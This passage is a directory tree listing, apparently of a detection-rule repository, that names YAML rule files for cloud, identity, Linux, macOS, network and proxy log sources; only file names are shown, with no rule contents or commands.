azure_app_permissions_msft.yml │ │ │ │ ├── azure_app_privileged_permissions.yml │ │ │ │ ├── azure_app_role_added.yml │ │ │ │ ├── azure_app_uri_modifications.yml │ │ │ │ ├── azure_auditlogs_laps_credential_dumping.yml │ │ │ │ ├── azure_change_to_authentication_method.yml │ │ │ │ ├── azure_federation_modified.yml │ │ │ │ ├── azure_group_user_addition_ca_modification.yml │ │ │ │ ├── azure_group_user_removal_ca_modification.yml │ │ │ │ ├── azure_guest_invite_failure.yml │ │ │ │ ├── azure_guest_to_member.yml │ │ │ │ ├── azure_pim_activation_approve_deny.yml │ │ │ │ ├── azure_pim_alerts_disabled.yml │ │ │ │ ├── azure_pim_change_settings.yml │ │ │ │ ├── azure_priviledged_role_assignment_add.yml │ │ │ │ ├── azure_priviledged_role_assignment_bulk_change.yml │ │ │ │ ├── azure_privileged_account_creation.yml │ │ │ │ ├── azure_subscription_permissions_elevation_via_auditlogs.yml │ │ │ │ ├── azure_tap_added.yml │ │ │ │ ├── azure_update_risk_and_mfa_registration_policy.yml │ │ │ │ ├── azure_user_account_mfa_disable.yml │ │ │ │ └── azure_user_password_change.yml │ │ │ ├── identity_protection/ │ │ │ │ ├── azure_identity_protection_anomalous_token.yml │ │ │ │ ├── azure_identity_protection_anomalous_user.yml │ │ │ │ ├── azure_identity_protection_anonymous_ip_activity.yml │ │ │ │ ├── azure_identity_protection_anonymous_ip_address.yml │ │ │ │ ├── azure_identity_protection_atypical_travel.yml │ │ │ │ ├── azure_identity_protection_impossible_travel.yml │ │ │ │ ├── azure_identity_protection_inbox_forwarding_rule.yml │ │ │ │ ├── azure_identity_protection_inbox_manipulation.yml │ │ │ │ ├── azure_identity_protection_leaked_credentials.yml │ │ │ │ ├── azure_identity_protection_malicious_ip_address.yml │ │ │ │ ├── azure_identity_protection_malicious_ip_address_suspicious.yml │ │ │ │ ├── azure_identity_protection_malware_linked_ip.yml │ │ │ │ ├── azure_identity_protection_new_coutry_region.yml │ │ │ │ ├── azure_identity_protection_password_spray.yml │ │ │ │ ├── 
azure_identity_protection_prt_access.yml │ │ │ │ ├── azure_identity_protection_suspicious_browser.yml │ │ │ │ ├── azure_identity_protection_threat_intel.yml │ │ │ │ ├── azure_identity_protection_token_issuer_anomaly.yml │ │ │ │ └── azure_identity_protection_unfamilar_sign_in.yml │ │ │ ├── privileged_identity_management/ │ │ │ │ ├── azure_pim_account_stale.yml │ │ │ │ ├── azure_pim_invalid_license.yml │ │ │ │ ├── azure_pim_role_assigned_outside_of_pim.yml │ │ │ │ ├── azure_pim_role_frequent_activation.yml │ │ │ │ ├── azure_pim_role_no_mfa_required.yml │ │ │ │ ├── azure_pim_role_not_used.yml │ │ │ │ └── azure_pim_too_many_global_admins.yml │ │ │ └── signin_logs/ │ │ │ ├── azure_account_lockout.yml │ │ │ ├── azure_ad_auth_failure_increase.yml │ │ │ ├── azure_ad_auth_sucess_increase.yml │ │ │ ├── azure_ad_auth_to_important_apps_using_single_factor_auth.yml │ │ │ ├── azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml │ │ │ ├── azure_ad_azurehound_discovery.yml │ │ │ ├── azure_ad_device_registration_or_join_without_mfa.yml │ │ │ ├── azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml │ │ │ ├── azure_ad_only_single_factor_auth_required.yml │ │ │ ├── azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml │ │ │ ├── azure_ad_sign_ins_from_noncompliant_devices.yml │ │ │ ├── azure_ad_sign_ins_from_unknown_devices.yml │ │ │ ├── azure_ad_suspicious_signin_bypassing_mfa.yml │ │ │ ├── azure_app_device_code_authentication.yml │ │ │ ├── azure_app_ropc_authentication.yml │ │ │ ├── azure_blocked_account_attempt.yml │ │ │ ├── azure_conditional_access_failure.yml │ │ │ ├── azure_legacy_authentication_protocols.yml │ │ │ ├── azure_login_to_disabled_account.yml │ │ │ ├── azure_mfa_denies.yml │ │ │ ├── azure_mfa_interrupted.yml │ │ │ ├── azure_unusual_authentication_interruption.yml │ │ │ ├── azure_user_login_blocked_by_conditional_access.yml │ │ │ └── azure_users_authenticating_to_other_azure_ad_tenants.yml │ │ ├── gcp/ │ │ │ ├── audit/ │ │ 
│ │ ├── gcp_access_policy_deleted.yml │ │ │ │ ├── gcp_breakglass_container_workload_deployed.yml │ │ │ │ ├── gcp_bucket_enumeration.yml │ │ │ │ ├── gcp_bucket_modified_or_deleted.yml │ │ │ │ ├── gcp_dlp_re_identifies_sensitive_information.yml │ │ │ │ ├── gcp_dns_zone_modified_or_deleted.yml │ │ │ │ ├── gcp_firewall_rule_modified_or_deleted.yml │ │ │ │ ├── gcp_full_network_traffic_packet_capture.yml │ │ │ │ ├── gcp_kubernetes_admission_controller.yml │ │ │ │ ├── gcp_kubernetes_cronjob.yml │ │ │ │ ├── gcp_kubernetes_rolebinding.yml │ │ │ │ ├── gcp_kubernetes_secrets_modified_or_deleted.yml │ │ │ │ ├── gcp_service_account_disabled_or_deleted.yml │ │ │ │ ├── gcp_service_account_modified.yml │ │ │ │ ├── gcp_sql_database_modified_or_deleted.yml │ │ │ │ └── gcp_vpn_tunnel_modified_or_deleted.yml │ │ │ └── gworkspace/ │ │ │ ├── gcp_gworkspace_application_access_levels_modified.yml │ │ │ ├── gcp_gworkspace_application_removed.yml │ │ │ ├── gcp_gworkspace_granted_domain_api_access.yml │ │ │ ├── gcp_gworkspace_mfa_disabled.yml │ │ │ ├── gcp_gworkspace_role_modified_or_deleted.yml │ │ │ ├── gcp_gworkspace_role_privilege_deleted.yml │ │ │ └── gcp_gworkspace_user_granted_admin_privileges.yml │ │ └── m365/ │ │ ├── audit/ │ │ │ ├── microsoft365_bypass_conditional_access.yml │ │ │ ├── microsoft365_disabling_mfa.yml │ │ │ └── microsoft365_new_federated_domain_added_audit.yml │ │ ├── exchange/ │ │ │ └── microsoft365_new_federated_domain_added_exchange.yml │ │ ├── threat_detection/ │ │ │ └── microsoft365_from_susp_ip_addresses.yml │ │ └── threat_management/ │ │ ├── microsoft365_activity_by_terminated_user.yml │ │ ├── microsoft365_activity_from_anonymous_ip_addresses.yml │ │ ├── microsoft365_activity_from_infrequent_country.yml │ │ ├── microsoft365_data_exfiltration_to_unsanctioned_app.yml │ │ ├── microsoft365_impossible_travel_activity.yml │ │ ├── microsoft365_logon_from_risky_ip_address.yml │ │ ├── microsoft365_potential_ransomware_activity.yml │ │ ├── 
microsoft365_pst_export_alert.yml │ │ ├── microsoft365_pst_export_alert_using_new_compliancesearchaction.yml │ │ ├── microsoft365_susp_inbox_forwarding.yml │ │ ├── microsoft365_susp_oauth_app_file_download_activities.yml │ │ ├── microsoft365_unusual_volume_of_file_deletion.yml │ │ └── microsoft365_user_restricted_from_sending_email.yml │ ├── identity/ │ │ ├── cisco_duo/ │ │ │ └── cisco_duo_mfa_bypass_via_bypass_code.yml │ │ ├── okta/ │ │ │ ├── okta_admin_activity_from_proxy_query.yml │ │ │ ├── okta_admin_role_assigned_to_user_or_group.yml │ │ │ ├── okta_admin_role_assignment_created.yml │ │ │ ├── okta_api_token_created.yml │ │ │ ├── okta_api_token_revoked.yml │ │ │ ├── okta_application_modified_or_deleted.yml │ │ │ ├── okta_application_sign_on_policy_modified_or_deleted.yml │ │ │ ├── okta_fastpass_phishing_detection.yml │ │ │ ├── okta_identity_provider_created.yml │ │ │ ├── okta_mfa_reset_or_deactivated.yml │ │ │ ├── okta_network_zone_deactivated_or_deleted.yml │ │ │ ├── okta_new_behaviours_admin_console.yml │ │ │ ├── okta_password_in_alternateid_field.yml │ │ │ ├── okta_policy_modified_or_deleted.yml │ │ │ ├── okta_policy_rule_modified_or_deleted.yml │ │ │ ├── okta_security_threat_detected.yml │ │ │ ├── okta_suspicious_activity_enduser_report.yml │ │ │ ├── okta_unauthorized_access_to_app.yml │ │ │ ├── okta_user_account_locked_out.yml │ │ │ ├── okta_user_created.yml │ │ │ └── okta_user_session_start_via_anonymised_proxy.yml │ │ └── onelogin/ │ │ ├── onelogin_assumed_another_user.yml │ │ └── onelogin_user_account_locked.yml │ ├── linux/ │ │ ├── auditd/ │ │ │ ├── execve/ │ │ │ │ ├── lnx_auditd_binary_padding.yml │ │ │ │ ├── lnx_auditd_bpfdoor_port_redirect.yml │ │ │ │ ├── lnx_auditd_capabilities_discovery.yml │ │ │ │ ├── lnx_auditd_change_file_time_attr.yml │ │ │ │ ├── lnx_auditd_chattr_immutable_removal.yml │ │ │ │ ├── lnx_auditd_clipboard_collection.yml │ │ │ │ ├── lnx_auditd_clipboard_image_collection.yml │ │ │ │ ├── lnx_auditd_coinminer.yml │ │ │ │ ├── 
lnx_auditd_data_compressed.yml │ │ │ │ ├── lnx_auditd_data_exfil_wget.yml │ │ │ │ ├── lnx_auditd_dd_delete_file.yml │ │ │ │ ├── lnx_auditd_file_or_folder_permissions.yml │ │ │ │ ├── lnx_auditd_find_cred_in_files.yml │ │ │ │ ├── lnx_auditd_hidden_files_directories.yml │ │ │ │ ├── lnx_auditd_hidden_zip_files_steganography.yml │ │ │ │ ├── lnx_auditd_masquerading_crond.yml │ │ │ │ ├── lnx_auditd_modify_system_firewall.yml │ │ │ │ ├── lnx_auditd_network_sniffing.yml │ │ │ │ ├── lnx_auditd_screencapture_import.yml │ │ │ │ ├── lnx_auditd_screencaputre_xwd.yml │ │ │ │ ├── lnx_auditd_steghide_embed_steganography.yml │ │ │ │ ├── lnx_auditd_steghide_extract_steganography.yml │ │ │ │ ├── lnx_auditd_susp_cmds.yml │ │ │ │ ├── lnx_auditd_susp_histfile_operations.yml │ │ │ │ ├── lnx_auditd_susp_service_reload_or_restart.yml │ │ │ │ ├── lnx_auditd_system_shutdown_reboot.yml │ │ │ │ ├── lnx_auditd_unzip_hidden_zip_files_steganography.yml │ │ │ │ └── lnx_auditd_user_discovery.yml │ │ │ ├── lnx_auditd_audio_capture.yml │ │ │ ├── lnx_auditd_disable_aslr_protection.yml │ │ │ ├── lnx_auditd_keylogging_with_pam_d.yml │ │ │ ├── lnx_auditd_password_policy_discovery.yml │ │ │ ├── lnx_auditd_susp_c2_commands.yml │ │ │ ├── lnx_auditd_system_info_discovery.yml │ │ │ ├── path/ │ │ │ │ ├── lnx_auditd_auditing_config_change.yml │ │ │ │ ├── lnx_auditd_bpfdoor_file_accessed.yml │ │ │ │ ├── lnx_auditd_hidden_binary_execution.yml │ │ │ │ ├── lnx_auditd_ld_so_preload_mod.yml │ │ │ │ ├── lnx_auditd_logging_config_change.yml │ │ │ │ ├── lnx_auditd_magic_system_request_key.yml │ │ │ │ ├── lnx_auditd_system_info_discovery2.yml │ │ │ │ ├── lnx_auditd_systemd_service_creation.yml │ │ │ │ └── lnx_auditd_unix_shell_configuration_modification.yml │ │ │ ├── service_stop/ │ │ │ │ └── lnx_auditd_disable_system_firewall.yml │ │ │ └── syscall/ │ │ │ ├── lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml │ │ │ ├── lnx_auditd_create_account.yml │ │ │ ├── lnx_auditd_load_module_insmod.yml │ │ │ ├── 
lnx_auditd_network_service_scanning.yml │ │ │ ├── lnx_auditd_split_file_into_pieces.yml │ │ │ ├── lnx_auditd_susp_discovery_sysinfo_syscall.yml │ │ │ ├── lnx_auditd_susp_exe_folders.yml │ │ │ ├── lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml │ │ │ └── lnx_auditd_web_rce.yml │ │ ├── builtin/ │ │ │ ├── clamav/ │ │ │ │ └── lnx_clamav_relevant_message.yml │ │ │ ├── cron/ │ │ │ │ └── lnx_cron_crontab_file_modification.yml │ │ │ ├── guacamole/ │ │ │ │ └── lnx_guacamole_susp_guacamole.yml │ │ │ ├── lnx_apt_equationgroup_lnx.yml │ │ │ ├── lnx_buffer_overflows.yml │ │ │ ├── lnx_clear_syslog.yml │ │ │ ├── lnx_file_copy.yml │ │ │ ├── lnx_ldso_preload_injection.yml │ │ │ ├── lnx_potential_susp_ebpf_activity.yml │ │ │ ├── lnx_privileged_user_creation.yml │ │ │ ├── lnx_shell_clear_cmd_history.yml │ │ │ ├── lnx_shell_susp_commands.yml │ │ │ ├── lnx_shell_susp_log_entries.yml │ │ │ ├── lnx_shell_susp_rev_shells.yml │ │ │ ├── lnx_shellshock.yml │ │ │ ├── lnx_susp_dev_tcp.yml │ │ │ ├── lnx_susp_jexboss.yml │ │ │ ├── lnx_symlink_etc_passwd.yml │ │ │ ├── sshd/ │ │ │ │ └── lnx_sshd_susp_ssh.yml │ │ │ ├── syslog/ │ │ │ │ ├── lnx_syslog_security_tools_disabling_syslog.yml │ │ │ │ └── lnx_syslog_susp_named.yml │ │ │ └── vsftpd/ │ │ │ └── lnx_vsftpd_susp_error_messages.yml │ │ ├── file_event/ │ │ │ ├── file_event_lnx_doas_conf_creation.yml │ │ │ ├── file_event_lnx_persistence_cron_files.yml │ │ │ ├── file_event_lnx_persistence_sudoers_files.yml │ │ │ ├── file_event_lnx_susp_filename_with_embedded_base64_command.yml │ │ │ ├── file_event_lnx_susp_shell_script_under_profile_directory.yml │ │ │ ├── file_event_lnx_triple_cross_rootkit_lock_file.yml │ │ │ ├── file_event_lnx_triple_cross_rootkit_persistence.yml │ │ │ └── file_event_lnx_wget_download_file_in_tmp_dir.yml │ │ ├── network_connection/ │ │ │ ├── net_connection_lnx_back_connect_shell_dev.yml │ │ │ ├── net_connection_lnx_crypto_mining_indicators.yml │ │ │ ├── net_connection_lnx_domain_localtonet_tunnel.yml │ │ │ ├── 
net_connection_lnx_ngrok_tunnel.yml │ │ │ └── net_connection_lnx_susp_malware_callback_port.yml │ │ └── process_creation/ │ │ ├── proc_creation_lnx_apt_shell_execution.yml │ │ ├── proc_creation_lnx_at_command.yml │ │ ├── proc_creation_lnx_auditctl_clear_rules.yml │ │ ├── proc_creation_lnx_av_kaspersky_av_disabled.yml │ │ ├── proc_creation_lnx_awk_shell_spawn.yml │ │ ├── proc_creation_lnx_base64_decode.yml │ │ ├── proc_creation_lnx_base64_execution.yml │ │ ├── proc_creation_lnx_base64_shebang_cli.yml │ │ ├── proc_creation_lnx_bash_interactive_shell.yml │ │ ├── proc_creation_lnx_bpf_kprob_tracing_enabled.yml │ │ ├── proc_creation_lnx_bpftrace_unsafe_option_usage.yml │ │ ├── proc_creation_lnx_cap_setgid.yml │ │ ├── proc_creation_lnx_cap_setuid.yml │ │ ├── proc_creation_lnx_capa_discovery.yml │ │ ├── proc_creation_lnx_capsh_shell_invocation.yml │ │ ├── proc_creation_lnx_chattr_immutable_removal.yml │ │ ├── proc_creation_lnx_chroot_execution.yml │ │ ├── proc_creation_lnx_clear_logs.yml │ │ ├── proc_creation_lnx_clear_syslog.yml │ │ ├── proc_creation_lnx_clipboard_collection.yml │ │ ├── proc_creation_lnx_cp_passwd_or_shadow_tmp.yml │ │ ├── proc_creation_lnx_crontab_enumeration.yml │ │ ├── proc_creation_lnx_crontab_removal.yml │ │ ├── proc_creation_lnx_crypto_mining.yml │ │ ├── proc_creation_lnx_curl_usage.yml │ │ ├── proc_creation_lnx_curl_wget_exec_tmp.yml │ │ ├── proc_creation_lnx_dd_file_overwrite.yml │ │ ├── proc_creation_lnx_dd_process_injection.yml │ │ ├── proc_creation_lnx_disable_ufw.yml │ │ ├── proc_creation_lnx_doas_execution.yml │ │ ├── proc_creation_lnx_env_shell_invocation.yml │ │ ├── proc_creation_lnx_esxcli_network_discovery.yml │ │ ├── proc_creation_lnx_esxcli_permission_change_admin.yml │ │ ├── proc_creation_lnx_esxcli_storage_discovery.yml │ │ ├── proc_creation_lnx_esxcli_syslog_config_change.yml │ │ ├── proc_creation_lnx_esxcli_system_discovery.yml │ │ ├── proc_creation_lnx_esxcli_user_account_creation.yml │ │ ├── 
proc_creation_lnx_esxcli_vm_discovery.yml │ │ ├── proc_creation_lnx_esxcli_vm_kill.yml │ │ ├── proc_creation_lnx_esxcli_vsan_discovery.yml │ │ ├── proc_creation_lnx_file_and_directory_discovery.yml │ │ ├── proc_creation_lnx_file_deletion.yml │ │ ├── proc_creation_lnx_find_shell_execution.yml │ │ ├── proc_creation_lnx_flock_shell_execution.yml │ │ ├── proc_creation_lnx_gcc_shell_execution.yml │ │ ├── proc_creation_lnx_git_shell_execution.yml │ │ ├── proc_creation_lnx_grep_os_arch_discovery.yml │ │ ├── proc_creation_lnx_groupdel.yml │ │ ├── proc_creation_lnx_install_root_certificate.yml │ │ ├── proc_creation_lnx_install_suspicious_packages.yml │ │ ├── proc_creation_lnx_iptables_flush_ufw.yml │ │ ├── proc_creation_lnx_local_account.yml │ │ ├── proc_creation_lnx_local_groups.yml │ │ ├── proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml │ │ ├── proc_creation_lnx_mkfifo_named_pipe_creation.yml │ │ ├── proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml │ │ ├── proc_creation_lnx_mount_hidepid.yml │ │ ├── proc_creation_lnx_netcat_reverse_shell.yml │ │ ├── proc_creation_lnx_nice_shell_execution.yml │ │ ├── proc_creation_lnx_nohup.yml │ │ ├── proc_creation_lnx_nohup_susp_execution.yml │ │ ├── proc_creation_lnx_omigod_scx_runasprovider_executescript.yml │ │ ├── proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml │ │ ├── proc_creation_lnx_perl_reverse_shell.yml │ │ ├── proc_creation_lnx_php_reverse_shell.yml │ │ ├── proc_creation_lnx_pnscan_binary_cli_pattern.yml │ │ ├── proc_creation_lnx_proxy_connection.yml │ │ ├── proc_creation_lnx_pua_trufflehog.yml │ │ ├── proc_creation_lnx_python_http_server_execution.yml │ │ ├── proc_creation_lnx_python_pty_spawn.yml │ │ ├── proc_creation_lnx_python_reverse_shell.yml │ │ ├── proc_creation_lnx_python_shell_os_system.yml │ │ ├── proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml │ │ ├── proc_creation_lnx_remote_system_discovery.yml │ │ ├── proc_creation_lnx_remove_package.yml │ │ 
├── proc_creation_lnx_rsync_shell_execution.yml │ │ ├── proc_creation_lnx_rsync_shell_spawn.yml │ │ ├── proc_creation_lnx_ruby_reverse_shell.yml │ │ ├── proc_creation_lnx_schedule_task_job_cron.yml │ │ ├── proc_creation_lnx_security_software_discovery.yml │ │ ├── proc_creation_lnx_security_tools_disabling.yml │ │ ├── proc_creation_lnx_services_stop_and_disable.yml │ │ ├── proc_creation_lnx_setgid_setuid.yml │ │ ├── proc_creation_lnx_ssh_shell_execution.yml │ │ ├── proc_creation_lnx_ssm_agent_abuse.yml │ │ ├── proc_creation_lnx_susp_chmod_directories.yml │ │ ├── proc_creation_lnx_susp_container_residence_discovery.yml │ │ ├── proc_creation_lnx_susp_curl_fileupload.yml │ │ ├── proc_creation_lnx_susp_curl_useragent.yml │ │ ├── proc_creation_lnx_susp_dockerenv_recon.yml │ │ ├── proc_creation_lnx_susp_execution_tmp_folder.yml │ │ ├── proc_creation_lnx_susp_find_execution.yml │ │ ├── proc_creation_lnx_susp_git_clone.yml │ │ ├── proc_creation_lnx_susp_history_delete.yml │ │ ├── proc_creation_lnx_susp_history_recon.yml │ │ ├── proc_creation_lnx_susp_hktl_execution.yml │ │ ├── proc_creation_lnx_susp_inod_listing.yml │ │ ├── proc_creation_lnx_susp_interactive_bash.yml │ │ ├── proc_creation_lnx_susp_java_children.yml │ │ ├── proc_creation_lnx_susp_network_utilities_execution.yml │ │ ├── proc_creation_lnx_susp_pipe_shell.yml │ │ ├── proc_creation_lnx_susp_process_reading_sudoers.yml │ │ ├── proc_creation_lnx_susp_recon_indicators.yml │ │ ├── proc_creation_lnx_susp_sensitive_file_access.yml │ │ ├── proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml │ │ ├── proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml │ │ ├── proc_creation_lnx_system_info_discovery.yml │ │ ├── proc_creation_lnx_system_network_connections_discovery.yml │ │ ├── proc_creation_lnx_system_network_discovery.yml │ │ ├── proc_creation_lnx_systemctl_mask_power_settings.yml │ │ ├── proc_creation_lnx_touch_susp.yml │ │ ├── proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml │ │ 
├── proc_creation_lnx_triple_cross_rootkit_install.yml │ │ ├── proc_creation_lnx_userdel.yml │ │ ├── proc_creation_lnx_usermod_susp_group.yml │ │ ├── proc_creation_lnx_vim_shell_execution.yml │ │ ├── proc_creation_lnx_webshell_detection.yml │ │ ├── proc_creation_lnx_wget_download_suspicious_directory.yml │ │ └── proc_creation_lnx_xterm_reverse_shell.yml │ ├── macos/ │ │ ├── file_event/ │ │ │ ├── file_event_macos_emond_launch_daemon.yml │ │ │ └── file_event_macos_susp_startup_item_created.yml │ │ └── process_creation/ │ │ ├── proc_creation_macos_applescript.yml │ │ ├── proc_creation_macos_base64_decode.yml │ │ ├── proc_creation_macos_binary_padding.yml │ │ ├── proc_creation_macos_change_file_time_attr.yml │ │ ├── proc_creation_macos_chflags_hidden_flag.yml │ │ ├── proc_creation_macos_clear_system_logs.yml │ │ ├── proc_creation_macos_clipboard_data_via_osascript.yml │ │ ├── proc_creation_macos_create_account.yml │ │ ├── proc_creation_macos_create_hidden_account.yml │ │ ├── proc_creation_macos_creds_from_keychain.yml │ │ ├── proc_creation_macos_csrutil_disable.yml │ │ ├── proc_creation_macos_csrutil_status.yml │ │ ├── proc_creation_macos_disable_security_tools.yml │ │ ├── proc_creation_macos_dscl_add_user_to_admin_group.yml │ │ ├── proc_creation_macos_dseditgroup_add_to_admin_group.yml │ │ ├── proc_creation_macos_dsenableroot_enable_root_account.yml │ │ ├── proc_creation_macos_file_and_directory_discovery.yml │ │ ├── proc_creation_macos_find_cred_in_files.yml │ │ ├── proc_creation_macos_gui_input_capture.yml │ │ ├── proc_creation_macos_hdiutil_create.yml │ │ ├── proc_creation_macos_hdiutil_mount.yml │ │ ├── proc_creation_macos_installer_susp_child_process.yml │ │ ├── proc_creation_macos_ioreg_discovery.yml │ │ ├── proc_creation_macos_jamf_susp_child.yml │ │ ├── proc_creation_macos_jamf_usage.yml │ │ ├── proc_creation_macos_jxa_in_memory_execution.yml │ │ ├── proc_creation_macos_launchctl_execution.yml │ │ ├── proc_creation_macos_local_account.yml │ │ ├── 
proc_creation_macos_local_groups.yml │ │ ├── proc_creation_macos_network_service_scanning.yml │ │ ├── proc_creation_macos_network_sniffing.yml │ │ ├── proc_creation_macos_nscurl_usage.yml │ │ ├── proc_creation_macos_office_susp_child_processes.yml │ │ ├── proc_creation_macos_osacompile_runonly_execution.yml │ │ ├── proc_creation_macos_payload_decoded_and_decrypted.yml │ │ ├── proc_creation_macos_persistence_via_plistbuddy.yml │ │ ├── proc_creation_macos_remote_access_tools_meshagent_arguments.yml │ │ ├── proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml │ │ ├── proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml │ │ ├── proc_creation_macos_remote_system_discovery.yml │ │ ├── proc_creation_macos_schedule_task_job_cron.yml │ │ ├── proc_creation_macos_screencapture.yml │ │ ├── proc_creation_macos_security_software_discovery.yml │ │ ├── proc_creation_macos_space_after_filename.yml │ │ ├── proc_creation_macos_split_file_into_pieces.yml │ │ ├── proc_creation_macos_susp_browser_child_process.yml │ │ ├── proc_creation_macos_susp_execution_macos_script_editor.yml │ │ ├── proc_creation_macos_susp_find_execution.yml │ │ ├── proc_creation_macos_susp_histfile_operations.yml │ │ ├── proc_creation_macos_susp_in_memory_download_and_compile.yml │ │ ├── proc_creation_macos_susp_macos_firmware_activity.yml │ │ ├── proc_creation_macos_susp_system_network_discovery.yml │ │ ├── proc_creation_macos_suspicious_applet_behaviour.yml │ │ ├── proc_creation_macos_swvers_discovery.yml │ │ ├── proc_creation_macos_sysadminctl_add_user_to_admin_group.yml │ │ ├── proc_creation_macos_sysadminctl_enable_guest_account.yml │ │ ├── proc_creation_macos_sysctl_discovery.yml │ │ ├── proc_creation_macos_system_network_connections_discovery.yml │ │ ├── proc_creation_macos_system_profiler_discovery.yml │ │ ├── proc_creation_macos_system_shutdown_reboot.yml │ │ ├── proc_creation_macos_tail_base64_decode_from_image.yml │ │ ├── 
proc_creation_macos_tmutil_delete_backup.yml │ │ ├── proc_creation_macos_tmutil_disable_backup.yml │ │ ├── proc_creation_macos_tmutil_exclude_file_from_backup.yml │ │ ├── proc_creation_macos_wizardupdate_malware_infection.yml │ │ ├── proc_creation_macos_xattr_gatekeeper_bypass.yml │ │ └── proc_creation_macos_xcsset_malware_infection.yml │ ├── network/ │ │ ├── cisco/ │ │ │ ├── aaa/ │ │ │ │ ├── cisco_cli_clear_logs.yml │ │ │ │ ├── cisco_cli_collect_data.yml │ │ │ │ ├── cisco_cli_crypto_actions.yml │ │ │ │ ├── cisco_cli_disable_logging.yml │ │ │ │ ├── cisco_cli_discovery.yml │ │ │ │ ├── cisco_cli_dos.yml │ │ │ │ ├── cisco_cli_file_deletion.yml │ │ │ │ ├── cisco_cli_input_capture.yml │ │ │ │ ├── cisco_cli_local_accounts.yml │ │ │ │ ├── cisco_cli_modify_config.yml │ │ │ │ ├── cisco_cli_moving_data.yml │ │ │ │ └── cisco_cli_net_sniff.yml │ │ │ ├── bgp/ │ │ │ │ └── cisco_bgp_md5_auth_failed.yml │ │ │ └── ldp/ │ │ │ └── cisco_ldp_md5_auth_failed.yml │ │ ├── dns/ │ │ │ ├── net_dns_external_service_interaction_domains.yml │ │ │ ├── net_dns_mal_cobaltstrike.yml │ │ │ ├── net_dns_pua_cryptocoin_mining_xmr.yml │ │ │ ├── net_dns_susp_b64_queries.yml │ │ │ ├── net_dns_susp_telegram_api.yml │ │ │ ├── net_dns_susp_txt_exec_strings.yml │ │ │ └── net_dns_wannacry_killswitch_domain.yml │ │ ├── firewall/ │ │ │ └── net_firewall_cleartext_protocols.yml │ │ ├── fortinet/ │ │ │ └── fortigate/ │ │ │ ├── fortinet_fortigate_new_admin_account_created.yml │ │ │ ├── fortinet_fortigate_new_firewall_address_object.yml │ │ │ ├── fortinet_fortigate_new_firewall_policy_added.yml │ │ │ ├── fortinet_fortigate_new_local_user_created.yml │ │ │ ├── fortinet_fortigate_new_vpn_ssl_web_portal.yml │ │ │ ├── fortinet_fortigate_user_group_modified.yml │ │ │ └── fortinet_fortigate_vpn_ssl_settings_modified.yml │ │ ├── huawei/ │ │ │ └── bgp/ │ │ │ └── huawei_bgp_auth_failed.yml │ │ ├── juniper/ │ │ │ └── bgp/ │ │ │ └── juniper_bgp_missing_md5.yml │ │ └── zeek/ │ │ ├── zeek_dce_rpc_mitre_bzar_execution.yml │ │ ├── 
zeek_dce_rpc_mitre_bzar_persistence.yml │ │ ├── zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml │ │ ├── zeek_dce_rpc_smb_spoolss_named_pipe.yml │ │ ├── zeek_default_cobalt_strike_certificate.yml │ │ ├── zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml │ │ ├── zeek_dns_mining_pools.yml │ │ ├── zeek_dns_nkn.yml │ │ ├── zeek_dns_susp_zbit_flag.yml │ │ ├── zeek_dns_torproxy.yml │ │ ├── zeek_http_executable_download_from_webdav.yml │ │ ├── zeek_http_susp_file_ext_from_susp_tld.yml │ │ ├── zeek_http_webdav_put_request.yml │ │ ├── zeek_rdp_public_listener.yml │ │ ├── zeek_smb_converted_win_atsvc_task.yml │ │ ├── zeek_smb_converted_win_impacket_secretdump.yml │ │ ├── zeek_smb_converted_win_lm_namedpipe.yml │ │ ├── zeek_smb_converted_win_susp_psexec.yml │ │ ├── zeek_smb_converted_win_susp_raccess_sensitive_fext.yml │ │ ├── zeek_smb_converted_win_transferring_files_with_credential_data.yml │ │ └── zeek_susp_kerberos_rc4.yml │ ├── web/ │ │ ├── product/ │ │ │ ├── apache/ │ │ │ │ ├── web_apache_segfault.yml │ │ │ │ └── web_apache_threading_error.yml │ │ │ └── nginx/ │ │ │ └── web_nginx_core_dump.yml │ │ ├── proxy_generic/ │ │ │ ├── proxy_download_susp_dyndns.yml │ │ │ ├── proxy_download_susp_tlds_blacklist.yml │ │ │ ├── proxy_download_susp_tlds_whitelist.yml │ │ │ ├── proxy_downloadcradle_webdav.yml │ │ │ ├── proxy_f5_tm_utility_bash_api_request.yml │ │ │ ├── proxy_hello_world_user_agent.yml │ │ │ ├── proxy_hktl_baby_shark_default_agent_url.yml │ │ │ ├── proxy_hktl_cobalt_strike_malleable_c2_requests.yml │ │ │ ├── proxy_hktl_empire_ua_uri_patterns.yml │ │ │ ├── proxy_pua_advanced_ip_scanner_update_check.yml │ │ │ ├── proxy_pwndrop.yml │ │ │ ├── proxy_raw_paste_service_access.yml │ │ │ ├── proxy_susp_flash_download_loc.yml │ │ │ ├── proxy_susp_ipfs_cred_harvest.yml │ │ │ ├── proxy_telegram_api.yml │ │ │ ├── proxy_ua_apt.yml │ │ │ ├── proxy_ua_base64_encoded.yml │ │ │ ├── proxy_ua_bitsadmin_susp_ip.yml │ │ │ ├── proxy_ua_bitsadmin_susp_tld.yml │ │ │ ├── 
